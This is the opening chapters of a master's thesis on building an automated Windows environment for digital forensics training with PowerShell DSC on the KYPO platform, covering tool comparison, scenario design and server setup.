Masaryk University Faculty of Informatics

Development of Environments for Trainings Aimed at Digital Forensics

Master’s Thesis

Vadim Janovskij

Brno, Spring 2018

Replace this page with a copy of the official signed thesis assignment anda copy of the Statement of an Author.

Declaration

Hereby I declare that this paper is my original authorial work, which I have worked out on my own. All sources, references, and literature used or excerpted during elaboration of this work are properly cited and listed in complete reference to the due source.

Vadim Janovskij

Advisor: RNDr. Daniel Kouřil, Ph.D.

i

Acknowledgements

I would like to thank my advisor RNDr. Daniel Kouřil, Ph.D., for his guidance, ideas and all the time spent with providing me a valuable feedback.

iii Abstract

The aim of this thesis is to create tools which will be used for build- ing the simulated MS Windows corporate environment suitable for forensics training. The environment created in such way is parameteri- zable, allows generation of forensics footprints. The created framework includes tools for building the infrastructure, injecting the security incidents and generating user’s activity in the systems. The first part of the thesis identifies important forensics areasin MS Windows environment and demonstrates the possible scenario, which enables the effective teaching of important forensics principles and areas. It also compares available orchestration tools and picks one best suitable for thesis needs. The second part describes the designed technical implementation, deployment process, populating environment with the data and in- jecting cybersecurity incidents.

iv Keywords

Digital forensics, Training, Windows, Security incident, Desire State Configuration

v

Contents

Introduction 1

1 Background 3 1.1 Digital Forensics ...... 3 1.2 KYPO – Cyber Exercise and Research Platform...... 4

2 Designing training aimed at Digital Forensics 5 2.1 Training overview ...... 5 2.2 Demonstration Scenario ...... 6 2.3 Designing environment architecture ...... 9 2.3.1 Domain Controller ...... 9 2.3.2 Microsoft Exchange ...... 11 2.3.3 Microsoft Internet Information Services (IIS) . . 11 2.3.4 Microsoft SQL Server ...... 11 2.3.5 File Share Server ...... 12

3 Designing semi-automated deployment process of the envi- ronment 13 3.1 Comparison of selected configuration management tools ... 13 3.1.1 Pupet ...... 14 3.1.2 Ansible ...... 15 3.1.3 Windows Desired State Configuration (DSC) . 15 3.1.4 Summary ...... 16 3.2 Understanding Desired State Configuration ...... 17 3.2.1 Modes of deployment ...... 17 3.2.2 DSC Architecture Overview ...... 18 3.3 Designing solution ...... 21 3.3.1 Powershell DSC scripts structure ...... 21 3.3.2 Deployment process ...... 22

4 Building the environment 25 4.1 Prerequisites ...... 25 4.2 Domain Controller ...... 26 4.2.1 Join nodes to domain ...... 27 4.2.2 Configuring shared storages ...... 28 4.3 Internet Information Services (IIS) Server ...... 30

vii 4.4 Microsoft SQL Server ...... 30 4.5 Exchange Server ...... 31 4.6 Windows Workstations ...... 32

5 Populating environment with the scenario data 35 5.1 Adding users, groups, and organizational units ...... 35 5.2 Deploying web application ...... 37 5.3 Simulation of users actions ...... 40

6 Security incidents injection 43 6.1 Password guessing ...... 45 6.2 Phishing email ...... 46 6.3 Malware injection ...... 49 6.4 Theft of sensitive information ...... 52 6.5 Disruption of company’s information services ...... 53

7 Conclusion 55

Bibliography 57

A Attachments 61

viii List of Tables

2.1 Typical types of servers present in organization. 10 3.1 Summary of tools comparison. 16 4.1 An overview of virtual machines involved in demonstration scenario. 25

ix

List of Figures

2.1 General structure of the training. 6 2.2 Stark Industries - Organization Chart. 8 2.3 Design of the environment architecture. 10 3.1 Desire State Configuration Architecture Overview. 18 3.2 Final DSC scripts structure. 22 3.3 Environment deployment process. 24 5.1 Organizational units and groups structure. 36 5.2 nopCommerce Installation page. 39 6.1 Attacks implemented in our sample Scenario. 44

xi

Introduction

Every organization must be prepared for the possibility of cybercrime within its network or on its computer systems. An organization should have employees who can recognize crimes like fraud, insider threat, industrial espionage, employees misuse, and computer intrusion. Such employees do not need to understand all technical aspects in depth, but they should be able to determine the severity of the crime correctly and in important cases escalate it to the forensics professionals. Every system administrator should learn how to extract key evidence from the Windows systems. Forensic artifacts are sensitive data that could be easily erased by improper actions. Without proper education of IT professionals in this area, companies risking irreversibly lost forensics evidence and never identify the guilty persons. Education in the environment that simulates a real computer net- work with realistic scenario has been shown as highly effective. It motivates the participants, and they are more involved in the educa- tion process. With the growth of virtualization technologies and cloud comput- ing simulation of such environment is much more simpler, scalable and realistic. Moreover today with the orchestration tools we are able to automate the whole deployment process and build such environ- ment with just a few scripts. The purpose of this thesis is to combine available deployment au- tomation tools, and scripting to build environments aimed at Digital Forensics with minimum human interaction needed. Design the sce- nario that will cover basic forensics areas in MS Windows environment and with automation scripts simulate a malicious activity that will leave forensic traces. The thesis is divided into seven chapters. Chapter 2 starts with describing digital forensics and provides reasons why it is beneficial for organizations to have forensically trained employees. Then the KYPO Cyber Exercise platform is introduced. Chapter 3 describe the design of the environment building process. It provides a comparison of selected configuration management tool and specifies reasons why I have decided to use the solution from Microsoft. Then it describes aspects of the selected technology and provides the design of the

1 deployment process. Chapter 4 illustrates the steps of the deployment process and introduce configuration scripts that have been created. Chapter 5 introduce the process of populating the environment with users and data. It is an important aspect because before injecting the security incidents our training environment need to contain users and data that will be compromised. Chapter 6 describes the injection of the security incidents and analyze the forensic footprints that have been generated in the systems. Chapter 7 summarize the main contribution of this thesis and suggests recommendations for further work.

2 1 Background

In this Chapter, we will say what is digital forensics and why it is important for organizations to have employees trained in this area. Then we will present KYPO - Cyber Exercise Platorm, the place where we will deploy our training environment and list benefits that it will bring to us.

1.1 Digital Forensics

Forensics[1] is a science of collecting, analyzing and reporting on digital data in a way that can be presented as evidence. The forensic investigator collects forensic artifacts, try to build relations between them and get the whole picture about the incident. Here is an example of forensic artifacts that can be found on a Windows systems: ∙ NFTS and file system ∙ Windows prefetch files ∙ Event logs ∙ Windows Shadow copies ∙ Registry ∙ Memory forensics The results of the forensic investigation can be either presented in a court or stayed internally in a corporation. Today a lot of forensic inves- tigations are not shared with law enforcement, and they stay internal inside the corporation. Organizations do the forensic investigation to understand what kind of breach they had and what information was leaked. With the increasing number of cybersecurity incidents, the need for computer forensics is growing. Having an IT team that is forensically trained can bring the following benefits to the organization: ∙ Save the organization money and time. The organization will not need to outsource basic forensics investigations but could solve it with its own IT department.

3 1. Background

∙ Identify the compromise of important systems faster.

∙ Minimize the disruption of organization’s daily business activi- ties during a forensic investigation.

1.2 KYPO – Cyber Exercise and Research Platform.

Our training environment will be based on the KYPO platform [2]. KYPO is being developed at Masaryk University. It provides a virtual- ized environment in a cloud that allows simulation of large networks, systems, services, and applications.Compare to a standard cloud en- vironment, KYPO will bring to our training environment additional benefits:

∙ KYPO provides Windows virtual machines and takes care of the proper network configuration.

∙ The environment is isolated from the outside world, and all con- nections are monitored. Because we are going to inject security incidents to our environment, our systems should have vulnera- bilities. KYPO platform ensures that those vulnerabilities will not be compromised by real hackers.

∙ KYPO provides a web portal that can be used by participants in order to interact with the sandbox and it gives a nice overview of the created environment infrastructure.

∙ Built-in monitoring is presented. KYPO provide flow data and captured packets from the network links [2].

4 2 Designing training aimed at Digital Foren- sics

In this chapter, I will introduce the basic design of our training, who is the main target group and what are the expected learning outcomes. Then I will present the demonstration scenario and the training en- vironment architecture. I will show that the designed environment closely simulate the enterprise infrastructure and contain all basic types of Windows Servers.

2.1 Training overview

Participants As it was mentioned the training aimed at IT systems administrators, people who manage organization network. Therefore basic knowledge of MS Windows environment and services is expected. Our training does not aim to educate forensics experts, for this purpose information security trainings by SANS1 Institute are available.

Learning outcomes Participants expect to learn fundamental forensics principals and prac- tices that will help them to identify security incident severity correctly. They need to acquire knowledge that the process of collecting evi- dence should be performed in a proper way to prevent it’s damage or modification. The integrity of the original evidence must be preserved.

General structure of the training In spite of the fact that the environment is located in the cloud and is accessible worldwide, the training is designed as on-site. The instruc- tor (coordinator) is present in the room during the learning process and is available for questions. Training is broken down into blocks; instructor introduce the particular forensic area, and then the partici- pants investigate this area on one of the servers that contain forensic

1. https://www.sans.org/ 5 2. Designing training aimed at Digital Forensics evidence related to this area. During each block the participants will

Figure 2.1: General structure of the training. perform the following steps: 1. Evaluate the scene, get familiar with the investigated machine (server/workstation). 2. Find and collect the related data. Be aware of data integrity. 3. Document everything. Each forensics investigation required maintaining the proper chain of custody. 4. Write a report. At the end of the training, each team presents their findings. The participants’ works in teams of 3-4 people. The collaboration between team members is assumed; participants should communicate and share information about the investigation with each other.

2.2 Demonstration Scenario

Now let’s look at the scenario itself. It is important to note that this is only one out of many possible scenarios. The environment and tools

6 2. Designing training aimed at Digital Forensics

to generate forensics artifacts are logically parameterizable and can be used to do the trainings based on many other stories. The primary purpose of this demonstration scenario is to show the functionality of the designed environment and tools. It will also help us to understand what infrastructure components and user actions we will need to simulate.

Insider attack

Our demonstration scenario will be based on the insider attack. Insider attacks[1] occur when there is a breach of trust by employees within the organization. Insiders have legitimate access to the particular systems within the company and do not need to overcome network perimeter. Therefore it is challenging to detect and protect against this types of attack. This types of attacks are not rare. According to McAfee[3] report, internal actors are responsible for more than 40% of the serious data breach incidents.

Scenario

Stark Industries is a lead company specializing in building aircraft engines. They sell their products through the E-commerce solution. Their website relies on the Microsoft SQL . The company invented new aircraft engine. The design of this new engine is top secret, and it seems to be the most significant break- through in aviation since the jet engine. The technology promises to allow jet engines to run safely at higher power levels than currently possible without overheating. of the engine will allow less than three hours. One of the employers is not satisfied with his salary and ask fora pay raise. Company management declined his request for a pay raise multiple times. He decided to contact rivalry company and offer them the of the new engine. He developed his evil plan how to steal the confidential documents and disrupt their business to cause financial loss to the company.

7 2. Designing training aimed at Digital Forensics

Our participants play the role of senior system administrators and were called to find out why E-shop is not running. They need totake necessary actions to find the guilty persons.

Players The organization chart of Stark Industries is shown in Figure 2.2. Three main players who are involved in our scenario is described below.

Jim Lumen Java Software Developer and our insider. He owns a workstation with Windows 10 Professional. For the hacking activity, he created a server in a cloud. His aims are:

∙ Perform corporate espionage for his own financial profit. ∙ Disrupt company’s business operations and cause financial loss.

Figure 2.2: Stark Industries - Organization Chart.

8 2. Designing training aimed at Digital Forensics

John Smith Chief Executive Officer of our organization. He has access to confiden- tial information available only to senior management. During the day he works a lot with his mailbox in Outlook 2016.

Travis Doe IT System Administrator, who is responsible for the infrastructure maintenance. He has issued a workstation with Windows 10 Profes- sional. During his working day, he routinely connects to the database and web application server through Remote Desktop Protocol.

2.3 Designing environment architecture

Network infrastructure in our environment should closely simulate the real corporate network. Therefore we need to deploy all types of servers that are common for the corporate environment. The standard types of servers that are implemented in organiza- tions are listed in Table 2.1. The example of the network that contains mentioned servers is illustrated in Figure 2.3 Now when we define the design of our network infrastructure lets looks at the concrete solutions offered by Microsoft. For each server, we also provide information why it is important for forensics investigation.

2.3.1 Domain Controller Domain Controller (DC) is a server running the Active Directory[4] ser- vice. Domain Controller server is a heart of the company infrastructure. It is used for storing information about objects in the network such as users, groups, computers, files, applications, and printers. Each object then has its Access control list (ACL) to maintain permissions who can access and manage this object. Since Active Directory is a place for granting security privileges and permissions it is a favorite target for attackers and essential part of a proper forensic investigation. Once the attackers gain high privileges,

9 2. Designing training aimed at Digital Forensics Table 2.1: Typical types of servers present in organization.

Type Description Directory server Allows authentication and authorization computers within the domain. Mail Server Takes care of electronic messaging. Emails are the primary communication channel in- side the organization. Web Server Runs some Web Application. There are many use cases for web applications, in our case, it will be a place where organization sells their products. Database Server Manages the . Our database server will maintain the collection of data for the web applications running on the web server. File Share Server Provides shared storage for user’s data. Do not require a separate server, could be im- plemented in a domain server.

Figure 2.3: Design of the environment architecture.

10 2. Designing training aimed at Digital Forensics

e.g., Domain Admin access, they love to change permissions and rights to keep an open back door. Forensic examiner has the responsibility to check for the changes in access control list (ACL).

2.3.2 Microsoft Exchange Microsoft Exchange[5] is a market leading solution for electronic mes- saging when we are talking about the corporate environment. Em- ployees use electronic messaging daily, and now it is far more than emails. Todays electronic messaging is not only about sending simple text email and file attachment. Now it also acts as a personal informa- tion manager, providing storage for and access to personal calendars, personal contacts, to-do and task lists, personal journals, and chat histories. [5] Therefore Exchange server is a large container of individual user mailboxes and personal information that is important for forensic investigation. A forensic examiner should have basic knowledge where to find database files and how to deal with this sensitive information.

2.3.3 Microsoft Internet Information Services (IIS) IIS[6] is a web server created by Microsoft. Web-based applications are highly popular today. Each more important organization have at least one web server in their network. Such web servers are not used only for selling products, but also for intranet websites, which contain sensitive information. It is not surprising that attacks on web applications belong to one of the most popular cyber attacks. Therefore effective analysis of the evidence from web servers is an essential forensic knowledge.

2.3.4 Microsoft SQL Server Microsoft SQL[7] is a popular commercial database solution. Microsoft offers both paid and free versions.[8] The free version is called SQL Server Express. It has the same capabilities rather as the paid one; however, there are some restrictions regarding the maximum database size. For managing and configuration SQL Server Management Studio (SSMS) application is used.

11 2. Designing training aimed at Digital Forensics

A lot of valuable application data are stored in the database. The most valuable forensic evidence that can be found on the SQL Server is database logs. It includes client connection logs, error logs or query logs.

2.3.5 File Share Server File share folders sometimes are not very obvious, and this service is not often installed as a dedicated server. The data saved on the file share can be accessed using a network path. The forensic investigation of the file share is very similar to the investigation of the Windows file system. The one additional thing that should be checked is permissions assigned to the files to identify users in the network who can access a given file.

12 3 Designing semi-automated deployment pro- cess of the environment

Because installation of Windows services require a significant amount of manual clicking and can take hours, deployment of our forensics environment should be automated and expect minimum human in- teraction. This approach will bring the following benefits: 1. Time-saving during the training preparation phase.

2. Elimination of human errors.

3. Repetitions of the deployment process. The environment will be in the same state after each deploy.

4. Scalability of the training. Training preparation for multiple groups will require just run the deployment scripts multiple times. In this chapter, I will introduce different tools for Windows automa- tion. I will provide reasons why I chose the solution from Microsoft. We will describe the architecture of the tool and based on it we will design the structure of our configuration scripts and procedure of the environment deployment process.

3.1 Comparison of selected configuration management tools

This section describes and compares three selected orchestration tech- nologies that support Windows systems. The list is not exhaustive, but it represents the most common open-source solutions. The following five questions are answered for all the tools to help to understand what solution best suits our needs: 1. What programming language is the tool written?

2. Is installation of an additional agent is needed on target nodes?

3. What is the format of configuration files?

13 3. Designing semi-automated deployment process of the environment

4. What is the number of available modules for MS Windows?

5. Is server required?

3.1.1 Pupet

Puppet is produced by Puppet1 company that was founded in 2005. The puppet was written in Ruby language and introduce its own con- figuration language. Puppet configuration files are called manifests. There is a group of modules that allows automating common Windows tasks. The list of tasks that could be automated in Windows environ- ment is listed in Puppet documentation [9]. There are 11 modules that support basic Windows configuration tasks. There is no solution for more complex tasks, like for example the configuration of SQL server or Exchange server. Puppet architecture[10] supports two modes of systems configura- tion. It can work either in a client-server architecture or in a stand-alone architecture. In a client-server architecture, one or more servers run the Puppet master application and the managed nodes run the Puppet agent. Puppet agent from time to time communicate with the master node and sends information about his configuration. Alternatively, stand-alone architecture is work as a push mode, it is run on demand and is suitable for initial server configuration. Both modes require a running Puppet agent on the managed nodes. This not an ideal solution for us. The automated installation process of the Puppet agents will have to be designed, and Puppet agents will use additional CPU and memory resources on our machines. Moreover, Puppet agent will leave additional digital footprints on our servers, and this fact could be confusing for participants during the training. Puppet masters can only run on machines. This means that we will need additional UNIX server in our infrastructure to perform the configuration.

1. https://puppet.com

14 3. Designing semi-automated deployment process of the environment

3.1.2 Ansible

Another orchestration tool is Ansible [11]. Unlike Puppet, the archi- tecture of Ansible is agentless. Windows hosts are configured with Windows Remote Management(WinRM) protocol. Ansible primarily runs in the push mode which is an analogy to Puppet stand-alone architecture. But it supports pull mode as well. Ansible is developed in Python. It is an advantage because KYPO is developed in Python as well. Therefore people who will prepare the training environment will be already familiar with this programming language. It is also important to say that for the preparation of Capture the flag games, Ansible is already actively used in KYPO. Configuration files are called playbooks (an equivalent of manifests in Puppet), and they are written in YAML, a simple human-readable markup language. Ansible started supporting Windows from version 1.7, and now there are 83 available Windows modules [12]. But again, there are no individual modules for configuration of SQL server or Exchange server. Of course, we could still create a PowerShell script for that and deploy it with win_shell module. Running Ansible com- mands from MS Windows (having Windows Server as a master node) is unsupported and additional UNIX server will be needed. [11]

3.1.3 Windows Desired State Configuration (DSC)

Windows PowerShell Desired State Configuration[13] is a solution from Microsoft. Desired State Configuration or DSC is a PowerShell extension and was introduced as part of Windows Management Frame- work version 4.0 included in the Windows Powershell 4.0. This means that it ships with Windows Server 2012 R2 and Windows 8.1. In older versions of operating systems, we can get DSC by merely upgrading Windows Management Framework. This is great because we do not need any agents, it works through WinRM (the same as Ansible). As well as Puppet and Ansible, DSC also supports two modes of deployment, push and pull configuration modes. Modules are written in PowerShell and configuration files use the special type of PowerShell function. The biggest advantage of DSC is the number of available modules. There are 277 different module

15 3. Designing semi-automated deployment process of the environment in PowerShell repository2, including modules for managing more complex services. Because DSC has been natively built for Windows, it is closely in- tegrated into Windows environment. We can push our configurations directly from the Domain Controller, and we do not need to perform any installation of the push server.

3.1.4 Summary

Table 3.1: Summary of tools comparison.

Tool Q1 Q2 Q3 Q4 Q5 Puppet Ruby Yes Puppet format 11 Yes Ansible Python No YAML 83 Yes DSC PowerShell No PowerShell function 227 No

The answers to the questions that were posed at the beginning of this section are summarized in the Table 3.1. According to the results, DSC is exactly what we are looking for. This is the list of reasons why I have decided for DSC: ∙ It has modules for all services that we are going to have in our environment. ∙ We do not need to install any additional frameworks and agents. Everything is already included in Windows Powershell version 4.0 or newer. ∙ There is no need for Linux server, and we can push our configu- rations from our Domain Controller. ∙ The tool is integrated into Windows PowerShell, no additional digital footprints in the system are generated. ∙ Puppet and Ansible have modules that support DSC configura- tions. So the created configuration scripts will also be compatible with Puppet and Ansible.

2. https://www.powershellgallery.com

16 3. Designing semi-automated deployment process of the environment 3.2 Understanding Desired State Configuration

Now we will look at DSC architecture and its terminology in more detail. The aim is to understand the architecture and base on it design the deployment process and configuration scripts in a way that will suit our needs. The basic idea behind DSC is simple. Organizations and system administrators write a configuration document that describes how the certain server should be configured. "This server is a domain con- troller, and this is a set of services that should be running here. Also, this software should be installed, and it should be configured in this way." Such descriptions also contains recommendations on how to make con- figuration consistent, reliable and secure. Desire State Configuration tries to simplify this task. To reach automation, you just need to write this configuration in a way that a computer, as well as human, can understand. Such easy-to-read configuration is high level and does not require diving into details and specifying what exact Powershell commands should be called. Moreover, the DSC resources are written by people who are experts in that particular resource so we can rely on that server configured in that way is reliable and meet basic security standards and recommendations. [13]

3.2.1 Modes of deployment DSC supports two modes of deployment, which are referred to as push and pull configuration modes.[13]

Pull Pull mode is more suitable for occasionally-connected nodes, such as IoT devices or laptops. If the device is off-line, the push mode will fail. In pull mode, we also need to have Internet Information Services (IIS) Web server that will contain configuration files for our target nodes. It behaves like a central repository and configuration files are pulled from it using HTTPS.

Push Our push computer needs to have a copy of any DSC Resource that we plan to use, and also each target node needs to have a copy of any DSC Resource modules that are used by its configuration.

17 3. Designing semi-automated deployment process of the environment

The concept of DSC Resources is described more in Section 3.2.2. To put it in a nutshell, it is an equivalent of libraries in the case of programming languages.

Figure 3.1: Desire State Configuration Architecture Overview.

3.2.2 DSC Architecture Overview Figure 3.1 illustrates the main parts of DSC architecture.

Type of nodes In architecture we have two types of nodes:

1. Authoring node - This is a single machine that represents a central element of our configuration process. We are sitting in front of this machine and sending configuration specifications to our target nodes.

18 3. Designing semi-automated deployment process of the environment

2. Target nodes - These are machines that we want to be configured in a certain way. For example we want a group of our target nodes be configured as Active Directory servers.

On the authoring node, we prepare our configuration scripts. For each type of server, that we want to have in our environment, we have a separate configuration script.

Listing 3.1: Example of Configuration file for DNS installation. Configuration NewDNSServer { Node TargetNode1 { WindowsFeatureDNS { Ensure="Present" Name="DNS" } } }

NewDNSServer

Configuration scripts

Source Code 3.1 demonstrate a sample of configuration script for cre- ating DNS server.Each DSC configuration script starts with keyword configuration. This is basically function. First, we define the configu- ration (function) with a particular name, and then this configuration with the specified name can be invoked. The main difference between function and configuration keywords is that configuration runs code whose output is a configuration docu- ment. Inside configuration function, we can use not only PowerShell code, but we can also declare keywords of resources. These resources represent building blocks for a DSC configuration.

19 3. Designing semi-automated deployment process of the environment

Resources

Resource modules represent building blocks of DSC. Each DSC re- source module consists of one or more PowerShell scripts. The author- ing computer and each target node need to have a copy of each DSC resource module that is used in the configuration file. To list all resources that are currently present on the computer we are using Get-DscResource command. If the required Resource is not installed on the host, we need either find a resource in the repository or create our own. The PowerShell community highly supports DSC and PowerShell Gallery contain all modules that we need to build our environment. It includes 227 unique modules in present time.

Managed Object Format

PowerShell configuration script produces Managed Object Format (MOF) file. In our case, this is PowerShell configuration script. Butitis important to say, that it can be generated by any other programming language, Python, Ruby, etc. In fact, we can even use Notepad to produce it, but of course, it is very impractical. MOF is a plain-text (ASCII) file that contains configuration specifi- cations. MOF is not a script; it is a collection of text instructions. These text instructions are written in a specific format that a computer can understand and interpret. Basically, it is a description of how we want our node to look like. MOF is a file that is sent to LCM to configure the target node.

Local Configuration Manager

The MOF is processing by Local Configuration Manager (LCM) on the target node. LCM is the Windows PowerShell Desired State Configu- ration engine that is present on each target node that we manage with DSC. It represents the essential part of the DSC. It read the received configuration document (MOF file), check if the local computer iscon- sistent with the provided document, calls the configuration resources and apply necessary modifications.

20 3. Designing semi-automated deployment process of the environment 3.3 Designing solution

Now when we have introduced the basic terminology and architecture of DSC, we can proceed with the designing of the deployment process of our forensics environment.

3.3.1 Powershell DSC scripts structure To make our configuration more scalable and parametrizable, we will separate static data from the dynamic data. Under the term static data I mean the script commands that are the same for each deployment process. Dynamic data is then variables that are changing according to the used scenario. Such configuration logic will allow us to change the configuration more quickly. ∙ Configuration script file - contains static data and commands needed to build a particular server. ∙ Configuration data file - stores all the parameterizable data nec- essary to build a new training environment. Therefore when we want to change the training scenario, we need only to modify the configuration data file. Our configuration script file will always be the same. Another improvement that will bring additional scalability and transparency to our DSC scripts will be made directly in the configu- ration data file. We will add additional ScenarioData key to the ConfigurationData hashtable, please see code sample 3.2. ScenarioData will contain the data that is related to the scenario and not specific to the node. The reason to separate scenario-specific data from node related data is that trainings are typically prepared by two different teams. One team prepares the infrastructure, andthe other team takes care of the scenario. Therefore the infrastructure team will work only with AllNodes part in the configuration data file while the Scenario team willwork only with the ScenarioData part. As the last thing, we need a script that will combine our config- uration data file and configuration script file and will start thecon- figuration process on the target node. This script expects that those

21 3. Designing semi-automated deployment process of the environment both files are located in the same directory. If we are going to runthis script from a different location, we need to specify the paths inthe input parameters.

Listing 3.2: Configuration data structure. @{ # Node related data AllNodes=@( ... );

# Training scenario related data ScenarioData=@{ ... } }

The final structure is shown in the Figure 3.2. The following script’s structure is in line with Microsoft DSC best practices [14].

Figure 3.2: Final DSC scripts structure.

3.3.2 Deployment process Now lets present the design of the environment deployment process. Each step is described in more detail in the Chapter 4. The environment deployment process is illustrated in the Figure 3.3.

22 3. Designing semi-automated deployment process of the environment

Step 1: Configure Apache shared storage for large files. Herewe will store data that is required for the installation of different services (ISO image files, executable files, etc.)

Step 2: Configure Windows Server that will be our authoring node, a central element of our configuration process. Install here all necessary DSC resources and create a shared folder, to share these resources with all target nodes in the network.

Step 3: Configure our authoring node node to a Domain Controller.

Step 4: Join all target machines to our Active Directory Domain.

Step 5: Configure IIS server from our authoring node.

Step 6: Download required installation files from shared storage. Install Microsoft SQL Server from our authoring node.

Step 7: Download files required for installation from shared storage. Install Microsoft Exchange Server from our authoring node.

Step 8: Configure the Workstations. Download and install office programs that are not possible to install with DSC.

23 3. Designing semi-automated deployment process of the environment Figure 3.3: Environment deployment process.

24 4 Building the environment

In this chapter, I will explain in depth the environment building pro- cess. We will go through the creation process of particular environ- ment elements and will look at the created DSC scripts that semi- automate this process.

Table 4.1: An overview of virtual machines involved in demonstration scenario.

Operating system Computer Name Architecture Windows Server 2016 Primary-DC 64-bit Windows Server 2016 IIS-Server 64-bit Windows Server 2016 SQL-Server 64-bit Windows Server 2016 Exchange-Server 64-bit Windows 10 JLumen-PC 64-bit Windows 10 JSmith-PC 64-bit Windows 10 TDoe-PC 64-bit Debian 8.0 linux-server 64-bit

4.1 Prerequisites

Let’s look at the systems and environment prerequisites before pro- ceeding with the installation. We need servers that comes with Windows Management Frame- work 5.1 because this is the version that includes the latest version of Windows PowerShell Desired State Configuration (DSC). The ideal server for us is Windows Server 2016 because it has all required features available. Of course, some older versions of Microsoft server operating systems could be used as well (Windows Server 2012, Windows Server 2012 R2, etc.) however the upgrade of Windows Management Framework would be required. Due to the same reasons, we will use Windows 10 operating system for employees workstations.

25 4. Building the environment

For the Linux server, there are almost no restrictions. We just need Linux distributions that bundle the Apache Web server. For our demonstration scenario, we will create the sandbox in KYPO with the nodes listed in the Table 4.1. They all will be connected to the same virtual computer network.

4.2 Domain Controller

This server will be our authoring node. The process of converting a server to a DC is known as promotion. A domain controller can be authoritative for one and only one domain. It is not possible to host multiple domains on a single DC. In a real enterprise environment, domains could be created in a series and form a domain tree [4]. In our demonstration scenario, we will have only one domain - starkindustries.com. The starkindustries.com domain itself than creates a root node of a domain tree. Then if in future we would like to have more prominent (worldwide) organization, we could add other domains, for example, Europe, Asia and Americas then the names would be europe.starkindustiries.com, asia.starkindustries.com, america.starkindustries.com. Before the promotion of our server to a domain controller, DNS service should be installed. DNS is an essential prerequisite of Active Directory. DNS makes it possible for clients in a domain to locate domain controllers and for the domain controllers that host directory service to communicate with each other. All steps mentioned above are automated by the Start-NewDomainController.ps1. This script takes two inputs, path to configuration data and the path to configuration script. Theonly purpose of this script is to combine these two parts and start the configuration process. The script should be run directly on the target node, that we want to promote for DC. Such procedure is an exception because it is a starting point for our environment deployment process. The configuration of all other servers will be performed by the domain controller.

26 4. Building the environment

Configuration data Configuration data file is called NewDomainControllerConfigData.psd1. Depending on the current training scenario the following parameters could be parameterized in the ScenarioData section: ∙ DomainName - domain name of a new domain controller. ∙ DomainAdminPassword - specifies the password for the Ad- ministrator account, that is used to install the domain controller.

Configuration script The configuration script will perform the following actions on a target server: 1. Install DNS feature.

2. Set preferred DNS address for the specified network interface to 127.0.0.1 (localhost).

3. Install Remote Server Administration Tool.

4. Install Active Directory Domain Services.

5. Create the new Active Directory Forest. For this purpose, script is using xADDomain function from the xActiveDirectory DSC module.

6. Wait for the creation process of new forest to finish.

4.2.1 Join nodes to domain After we have successfully created the Active Directory domain, we should add all the nodes to the domain. This operation could also be done by DSC resources. Adding to the domain is automated by Start-AddToDomain.ps1. This script again takes two files, configuration data file, and the con- figuration script file. The disadvantage of this script is that it should be run directly on target nodes. We cannot push this configuration from our authoring node because for that action we need our nodes to be in the domain.

27 4. Building the environment

Configuration data Configuration data file is called AddToDomainConfigData.psd1. De- pending on the current training scenario the following parameters could be parameterized in the ScenarioData section:

∙ DomainName - the name of the domain to which we want to join the node. ∙ DomainAdminPassword - password of the domain administra- tor account. ∙ DnsServerAddress - IP address of DNS server. Same as IP ad- dress of the Active Directory server.

Configuration script The configuration script file name is AddToDomain.ps1. The script per- forms two basic actions, setting the DNS server address and adding the node to the specified domain.

4.2.2 Configuring shared storages Before pushing the configurations to our target nodes from the Domain Controller, we need to configure shared storages. There are two types of shared storages:

∙ Storage for DSC resources.

∙ Storage for files required during installation.

Shared storage for DSC resources As it was mentioned in section 3.2, push mode requires a copy of each DSC resource modules that we are using in our configuration to make them available both on authoring node as well as on target nodes. We will solve this problem with the setup of the file share. Using this file share, we will copy all DSC resources to the target nodes. To automate the process of share setup, script Share-Dsc-Resources. ps1 has been created. The script performs the following actions on the node:

28 4. Building the environment

∙ Create and expose folder on the C drive. Granted everyone in domain full access permission to this folder.

∙ Install DSC modules from PowerShell repository on authoring node. Save the copy of each installed DSC module as ZIP archive in the shared folder.

Once we have the share setup, we need to copy the modules to each node in the domain. They will be copied to a special PowerShell folder for modules. To do this, we have two files available:

1. Start-Copy-Resources-To-TargetNodes.ps1: Starts the copy- ing process.

2. Copy-Resources-To-Target-Nodes-ConfigData.psd1: Config- uration data file contains the list of the nodes to which the re- sources will be copied.

Shared storage for installation files

Installation of some services requires additional installation files. Those files could be ISO files (archive files of an installation medium) orexe- cutable binary files. We need to ensure the presence of those files in some accessible place. In our case, we will put those files on Apache Server that is accessi- ble by each node in our network. Each file will have unique URL and will be downloaded on target node during the installation process. Of course, network shared storage from the previous step could be used as well. However, to get large files into KYPO sandbox, Apache Server is a more convenient solution. To automate the installation of Apache Server and configuration of the shared folder we could run the simple shell script on our De- bian server apache-file-share-install.sh. Once we have the share folder setup everything we put into /var/www will be publicly accessi- ble.

29 4. Building the environment 4.3 Internet Information Services (IIS) Server

The installation of Internet Information Services (IIS) on a server is a simple process that does not require any DSC Resources. It is basically just installation of several Windows Features. The process of installing required features is automated by the Start-NewIIS-Installation.ps1.

Configuration data Configuration data file is called NewIISConfigData.psd1. As it was previously mentioned, the installation process is just adding Windows Features, so this time there are no parameterizable parameters in the ScenarioData section. The only variable that needs to be specified in the configuration data file is the name of the target server.

Configuration script The configuration script is called NewIIS.ps1 and will perform the following actions on a target server: 1. Install IIS feature. 2. Install ASP.NET. 3. Install IS Management Tools.

4.4 Microsoft SQL Server

Most of the configuration options for MSSQL are set or viewed through the Microsoft SQL Server Management Studio (SSMS). Besides SQL engine we will also install SSMS. SSMS will be used to configure, monitor, and administrate SQL server [15]. The installation process of the SQL engine and SSMS is automated by the Start-NewSQLServer.ps1.

Configuration data Configuration data file is called NewSQLServerConfigData.psd1. There are no parameterizable parameters in the ScenarioData section. In the

30 4. Building the environment

NodeData section besides target server name, we need to provide URL links to SQL Server installation ISO and SSMS executable file with the Product ID. The product ID is required parameter when Package DSC Resource is used (resource for installing MSI and executable files). This is a unique identifier for the product we are installed. If the Product ID does not correspond the provided package, the installation will fail. The manual how to get Product ID for a particular package can be found here[16]. Files mentioned above need to be in advance stored on Apache server.

Configuration script The configuration script is called NewSQLServer.ps1 and will perform the following actions on a target server:

1. Create a new folder for SQL installation files. (C:\SQLInstallationDirectory)

2. Download SQL Server installation ISO from the shared storage.

3. Download SSMS executable file.

4. Perform required installation steps.

4.5 Exchange Server

